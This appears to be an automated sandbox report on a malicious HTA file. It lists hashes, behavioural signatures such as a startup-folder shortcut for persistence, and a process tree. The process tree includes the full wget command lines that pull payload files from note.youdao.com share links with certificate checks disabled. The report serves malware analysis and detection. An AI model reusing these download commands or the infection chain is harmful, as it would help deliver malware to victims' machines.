Analysis
-
max time kernel
63s -
max time network
66s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2022 23:37
Static task
static1
Behavioral task
behavioral1
Sample
7.hta
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
7.hta
Resource
win10v2004-20220812-en
General
-
Target
7.hta
-
Size
1.4MB
-
MD5
dd5b29f38ada264a89dbafab6ed35ec3
-
SHA1
c77ce7470ff68d53825cc664cec35302e0d197c7
-
SHA256
1faa9cb2b997e1a07e82087c1722fe12ea1fe5b48897d6edf34c8171b88e12f3
-
SHA512
3778863b14860a7d939ecc2bf96dd6a79e8ea4452222150d9c5860cb54e1668de731e1989d1490885c824ced9bd24de5822b86669ed64a6769e2546ee13fe1fc
-
SSDEEP
24576:1jduwC1N3WLIxP456UKkcCByVidDdlYhCNcql2BeqKflYhBepIjmXlcLI:NdA33Kz0ZQDP9Gqnl
Malware Config
Signatures
-
Executes dropped EXE 7 IoCs
Processes:
wget.exewget.exewget.exewget.exewget.exewget.exeWpG.exepid process 4508 wget.exe 4684 wget.exe 3716 wget.exe 3756 wget.exe 4400 wget.exe 3280 wget.exe 3592 WpG.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
Processes:
WpG.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\Tisle-updaTsys.lnk WpG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\Tisle-updaTsys.lnk WpG.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
explorer.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 54 IoCs
Processes:
explorer.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 0100000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\1\NodeSlot = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\1\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Music" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Music" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\1 = 54003100000000009655d504100066594131524300003e0009000400efbe9655d5049655d5042e0000004c2e0200000007000000000000000000000000000000bbaff600660059004100310052004300000016000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000009655c30410003259636a38003c0009000400efbe9655c3049655c3042e0000002e2e0200000006000000000000000000000000000000a7ac08013200590063006a003800000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 7c003100000000009655c30411005075626c69630000660009000400efbe874fdb499655c3042e000000f80500000000010000000000000000003c00000000008b5ffa005000750062006c0069006300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003600000016000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000000c5519991100557365727300640009000400efbe874f77489655c1042e000000c70500000000010000000000000000003a00000000008714af0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\1 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 78003100000000009655c30411004d7573696300640009000400efbe874fdb499655c3042e000000fd0500000000010000000000000000003a0000000000a7ac08014d007500730069006300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380030003300000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
explorer.exeexplorer.exepid process 3348 explorer.exe 1332 explorer.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
mshta.exewget.exewget.exewget.exepid process 2112 mshta.exe 4684 wget.exe 4684 wget.exe 3756 wget.exe 3756 wget.exe 3280 wget.exe 3280 wget.exe 2112 mshta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
mshta.exedescription pid process Token: SeDebugPrivilege 2112 mshta.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
mshta.exepid process 2112 mshta.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
explorer.exeexplorer.exepid process 3348 explorer.exe 3348 explorer.exe 1332 explorer.exe 1332 explorer.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
mshta.exeexplorer.exewget.exewget.exewget.exeexplorer.exedescription pid process target process PID 2112 wrote to memory of 1108 2112 mshta.exe explorer.exe PID 2112 wrote to memory of 1108 2112 mshta.exe explorer.exe PID 3348 wrote to memory of 4508 3348 explorer.exe wget.exe PID 3348 wrote to memory of 4508 3348 explorer.exe wget.exe PID 3348 wrote to memory of 4508 3348 explorer.exe wget.exe PID 4508 wrote to memory of 4684 4508 wget.exe wget.exe PID 4508 wrote to memory of 4684 4508 wget.exe wget.exe PID 4508 wrote to memory of 4684 4508 wget.exe wget.exe PID 3348 wrote to memory of 3716 3348 explorer.exe wget.exe PID 3348 wrote to memory of 3716 3348 explorer.exe wget.exe PID 3348 wrote to memory of 3716 3348 explorer.exe wget.exe PID 3716 wrote to memory of 3756 3716 wget.exe wget.exe PID 3716 wrote to memory of 3756 3716 wget.exe wget.exe PID 3716 wrote to memory of 3756 3716 wget.exe wget.exe PID 3348 wrote to memory of 4400 3348 explorer.exe wget.exe PID 3348 wrote to memory of 4400 3348 explorer.exe wget.exe PID 3348 wrote to memory of 4400 3348 explorer.exe wget.exe PID 4400 wrote to memory of 3280 4400 wget.exe wget.exe PID 4400 wrote to memory of 3280 4400 wget.exe wget.exe PID 4400 wrote to memory of 3280 4400 wget.exe wget.exe PID 2112 wrote to memory of 992 2112 mshta.exe explorer.exe PID 2112 wrote to memory of 992 2112 mshta.exe explorer.exe PID 1332 wrote to memory of 3592 1332 explorer.exe WpG.exe PID 1332 wrote to memory of 3592 1332 explorer.exe WpG.exe PID 1332 wrote to memory of 3592 1332 explorer.exe WpG.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\windows\explorer.exe"C:\windows\explorer.exe" C:\Users\Public\Music\2Ycj82⤵PID:1108
-
C:\windows\explorer.exe"C:\windows\explorer.exe" C:\Users\Public\Music\fYA1RC2⤵PID:992
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Public\wget.exe"C:\Users\Public\wget.exe" "https://note.youdao.com/yws/api/personal/share?method=get&shareKey=cfae45c9e7cc8a7734b72abe98235dd1" --no-check-certificate -O C:\Users\Public\AcpeH3.txt -b -q2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Users\Public\wget.exe"C:\Users\Public\wget.exe" "https://note.youdao.com/yws/api/personal/share?method=get&shareKey=cfae45c9e7cc8a7734b72abe98235dd1" --no-check-certificate -O C:\Users\Public\AcpeH3.txt -b -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4684 -
C:\Users\Public\wget.exe"C:\Users\Public\wget.exe" "https://note.youdao.com/yws/public/notebook/cfae45c9e7cc8a7734b72abe98235dd1/subdir/WEB842633ba1786c31f2996429d59ceca79" --no-check-certificate -O C:\Users\Public\dAHnYY.txt -b -q2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Users\Public\wget.exe"C:\Users\Public\wget.exe" "https://note.youdao.com/yws/public/notebook/cfae45c9e7cc8a7734b72abe98235dd1/subdir/WEB842633ba1786c31f2996429d59ceca79" --no-check-certificate -O C:\Users\Public\dAHnYY.txt -b -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3756 -
C:\Users\Public\wget.exe"C:\Users\Public\wget.exe" "https://note.youdao.com/yws/api/personal/file/WEBd99399b823c1430d95daeb97c0d046a4?method=download&shareKey=cfae45c9e7cc8a7734b72abe98235dd1" --no-check-certificate -O C:\Users\Public\TfS48H.zip -b -q2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Public\wget.exe"C:\Users\Public\wget.exe" "https://note.youdao.com/yws/api/personal/file/WEBd99399b823c1430d95daeb97c0d046a4?method=download&shareKey=cfae45c9e7cc8a7734b72abe98235dd1" --no-check-certificate -O C:\Users\Public\TfS48H.zip -b -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3280
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1960
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Public\xGBe5c\WpG.exe"C:\Users\Public\xGBe5c\WpG.exe" C:\Users\Public\w4E.zip -d C:\Users\Admin\AppData\Roaming2⤵
- Executes dropped EXE
- Drops startup file
PID:3592
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5b57539a67312fc27dfce073454b4aa56
SHA1bfe2c7b2b50ba4848461b79c7a78aa4e0e6ce11e
SHA256a5bf8258a0a49c33e0b4de3a8ce0d333bff40ed145fc2625978cad3a0acf9435
SHA51239eb27ad2214453c390cac92504b1b245d11da86a2ce612674e31c3955564f0af84fba259ef7826c6cff0101a79666d5b98e087e63f061f53ad8988bf6419043
-
Filesize
3KB
MD526e5ced51b587c824445822abe3aeeee
SHA13e72fa2a4721723f65a737cad8931e4209919766
SHA25658fd9fa720cefe31e24a11aa441d72704e29e9f3e8f3c8fc907789dd7772f0a0
SHA512f48826b2de0b79a4e77da2f68579ee329861dcb6f1c825b55a3f68894034ab2f927a4fb136ad4290f604ff964bcbe2d1390e2fee26ecf82e89828c15764c2fcf
-
Filesize
1KB
MD57c5a251cff15ff347c99d5fb8d78fc6d
SHA11d25a2bed1d2a87b5d1a0aef37f099b1beaa3c08
SHA256b85ff00edd59f29afac43fb0f944a6597fb1673f1ff12a4ec5b5a850f3176911
SHA5126cbe2edf11aa947c7b9b4e1187a5ed1bf58884e6cd2dbe0964539161bb0ba7bfc5701d01d95ff4441a25c7b68c62e330cc7ba0189d9e55fb286fcac298cbe906
-
Filesize
1KB
MD565d55cc01a1396921373db54eb383b74
SHA18b7b7dcee97507a9f9a2b841d90bc36d85c9be59
SHA256d9d4585b22fd902d6cec4ba716e5cecbfc4c613fd4ce27fa616e88845235757c
SHA5120a242d344ee0576eb16020b038a53cfcefdeaa1678e2e9cde62227e664bdc746b571efbee36ae2872e0d3eab64d5bcb3aab3e37b55f74ce8eb287edf75e2f66f
-
Filesize
1KB
MD50221dcad94eb18490b33ff509840dac5
SHA10682a6dcb590ccc1c16d472560043347cadb0414
SHA256ebcecf4845b31b84e50bcfad9d57dfb6417b25e092d33c454df9c07bd72223da
SHA51237b384550e7b14511451c2e24deba869787b74ba3c777ef3beaf43addbd6d040fa7a17bd14c3b47e0d36beb072d3efa4c86826d6662993b22721d358e5b9d6c2
-
Filesize
1KB
MD565d55cc01a1396921373db54eb383b74
SHA18b7b7dcee97507a9f9a2b841d90bc36d85c9be59
SHA256d9d4585b22fd902d6cec4ba716e5cecbfc4c613fd4ce27fa616e88845235757c
SHA5120a242d344ee0576eb16020b038a53cfcefdeaa1678e2e9cde62227e664bdc746b571efbee36ae2872e0d3eab64d5bcb3aab3e37b55f74ce8eb287edf75e2f66f
-
Filesize
1KB
MD585a373091f393e0028a59f04a22c660d
SHA121710a526b91debec0d62522f5f8479e87631a25
SHA2560d35fe630c8eabe5ce19ba26fef95e120c12286ae525ecf5e6ecb88906e69c19
SHA512341b6d87a435a25513c964c30cd4aa3853a4552107aa3154fe9283e1f84cabfe52e05be1f879253ba83d7066dc3ff60e9fa940819fa05754767bfbd0efeb9415
-
Filesize
1KB
MD57b6201a6cbb9bde36e71e2690159f0c9
SHA1e713f05758d52211a8e8a029d63d332a8c35c182
SHA256bbbce14b8d6fbe3cc9b1314d4e9bb12e41fc5ae486206a38499a8cd162ddee84
SHA512b5a784a1a3a7692d48eed330e5389282844f75c71d9d0a94aaa09030cb3309802b1026e8993e5473b33012edb41771997c18be0ddadf8b7fe4d40253c618f5a7
-
Filesize
82B
MD51f5cc545cff8d1fcf72d9d823452faf5
SHA17e1507b54c3d529675fe972651a41f98846533f3
SHA256d3686d030b788962a639f5714eb3540c41639a112ecdbd26f5dfe86da7ddd172
SHA512aace8fa6b1a30000fc2305c4b5c083ac2c0d2f3cc54c1ef3e48f33a3f0e90e809224be298512f302f7af0eb8a997b3e6c5a542616749ebcc7603e0639e1fb169
-
Filesize
82B
MD51f5cc545cff8d1fcf72d9d823452faf5
SHA17e1507b54c3d529675fe972651a41f98846533f3
SHA256d3686d030b788962a639f5714eb3540c41639a112ecdbd26f5dfe86da7ddd172
SHA512aace8fa6b1a30000fc2305c4b5c083ac2c0d2f3cc54c1ef3e48f33a3f0e90e809224be298512f302f7af0eb8a997b3e6c5a542616749ebcc7603e0639e1fb169
-
Filesize
1KB
MD5719add4ca39101eae9e9ca20775febe7
SHA113534c99fdc2f23477268ae19a964fbfa9d790c5
SHA256bf4aab421bdc499bedfd9d158f18707e6ab52199312a3188548703b83bd228b7
SHA51211f80b0b6ebed84db67064d5ca92f7837c8c60a947646b50b8eaa0dc7ecbe472ae16ca33041dc4f179244543e90a6339d214e0ebdf205cf340952d08ca834d85
-
Filesize
1KB
MD57c5a251cff15ff347c99d5fb8d78fc6d
SHA11d25a2bed1d2a87b5d1a0aef37f099b1beaa3c08
SHA256b85ff00edd59f29afac43fb0f944a6597fb1673f1ff12a4ec5b5a850f3176911
SHA5126cbe2edf11aa947c7b9b4e1187a5ed1bf58884e6cd2dbe0964539161bb0ba7bfc5701d01d95ff4441a25c7b68c62e330cc7ba0189d9e55fb286fcac298cbe906
-
Filesize
82B
MD51f5cc545cff8d1fcf72d9d823452faf5
SHA17e1507b54c3d529675fe972651a41f98846533f3
SHA256d3686d030b788962a639f5714eb3540c41639a112ecdbd26f5dfe86da7ddd172
SHA512aace8fa6b1a30000fc2305c4b5c083ac2c0d2f3cc54c1ef3e48f33a3f0e90e809224be298512f302f7af0eb8a997b3e6c5a542616749ebcc7603e0639e1fb169
-
Filesize
1KB
MD565d55cc01a1396921373db54eb383b74
SHA18b7b7dcee97507a9f9a2b841d90bc36d85c9be59
SHA256d9d4585b22fd902d6cec4ba716e5cecbfc4c613fd4ce27fa616e88845235757c
SHA5120a242d344ee0576eb16020b038a53cfcefdeaa1678e2e9cde62227e664bdc746b571efbee36ae2872e0d3eab64d5bcb3aab3e37b55f74ce8eb287edf75e2f66f
-
Filesize
1KB
MD565d55cc01a1396921373db54eb383b74
SHA18b7b7dcee97507a9f9a2b841d90bc36d85c9be59
SHA256d9d4585b22fd902d6cec4ba716e5cecbfc4c613fd4ce27fa616e88845235757c
SHA5120a242d344ee0576eb16020b038a53cfcefdeaa1678e2e9cde62227e664bdc746b571efbee36ae2872e0d3eab64d5bcb3aab3e37b55f74ce8eb287edf75e2f66f
-
Filesize
1KB
MD51097cbfe052d0733adb9ce26f127d3f5
SHA1a4ad31fa0aa3281eea77d4dab6fb54fcf0f427d3
SHA25661e2343e22c0523b07a57cbf9cbe564991559e62831570f07c1795d7a3cd2e92
SHA512cd422c0474d5d9f700a73232aaf825c229e50643f2eaabdde15f63d305c6eb395abd35b904e727692d8d308ce0f2a02d917bfcdb7b55bdb9b03b8aae3da34d6a
-
Filesize
82B
MD51f5cc545cff8d1fcf72d9d823452faf5
SHA17e1507b54c3d529675fe972651a41f98846533f3
SHA256d3686d030b788962a639f5714eb3540c41639a112ecdbd26f5dfe86da7ddd172
SHA512aace8fa6b1a30000fc2305c4b5c083ac2c0d2f3cc54c1ef3e48f33a3f0e90e809224be298512f302f7af0eb8a997b3e6c5a542616749ebcc7603e0639e1fb169
-
Filesize
82B
MD51f5cc545cff8d1fcf72d9d823452faf5
SHA17e1507b54c3d529675fe972651a41f98846533f3
SHA256d3686d030b788962a639f5714eb3540c41639a112ecdbd26f5dfe86da7ddd172
SHA512aace8fa6b1a30000fc2305c4b5c083ac2c0d2f3cc54c1ef3e48f33a3f0e90e809224be298512f302f7af0eb8a997b3e6c5a542616749ebcc7603e0639e1fb169
-
Filesize
1KB
MD585a373091f393e0028a59f04a22c660d
SHA121710a526b91debec0d62522f5f8479e87631a25
SHA2560d35fe630c8eabe5ce19ba26fef95e120c12286ae525ecf5e6ecb88906e69c19
SHA512341b6d87a435a25513c964c30cd4aa3853a4552107aa3154fe9283e1f84cabfe52e05be1f879253ba83d7066dc3ff60e9fa940819fa05754767bfbd0efeb9415
-
Filesize
1KB
MD569bae155a6fa857a4c111fd425eaa434
SHA1a42e90f7b7d3d87d8a6f6dba7ecc968a46fb0444
SHA256b0516c23b23f4d7e133ea3cbcff46fdd95f0875e35a714fb5558f5b6c16a7276
